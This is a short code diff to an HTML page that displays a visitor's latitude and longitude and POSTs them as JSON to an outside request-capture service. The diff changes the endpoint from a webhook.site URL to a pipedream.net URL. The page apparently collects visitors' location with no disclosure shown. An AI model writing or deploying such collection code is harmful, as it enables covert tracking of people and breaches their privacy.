--- a/index.html
+++ b/index.html
@@ -14,7 +14,7 @@
 
       document.body.innerHTML += `<p>Latitude : ${lat}</p><p>Longitude : ${lon}</p>`;
 
-      fetch("https://webhook.site/c1ffd295-6e0c-4853-a78d-5189f92c5a04", {
+      fetch("https://eofc0axgg7ewuht.m.pipedream.net", {
         method: "POST",
         headers: {
           "Content-Type": "application/json"
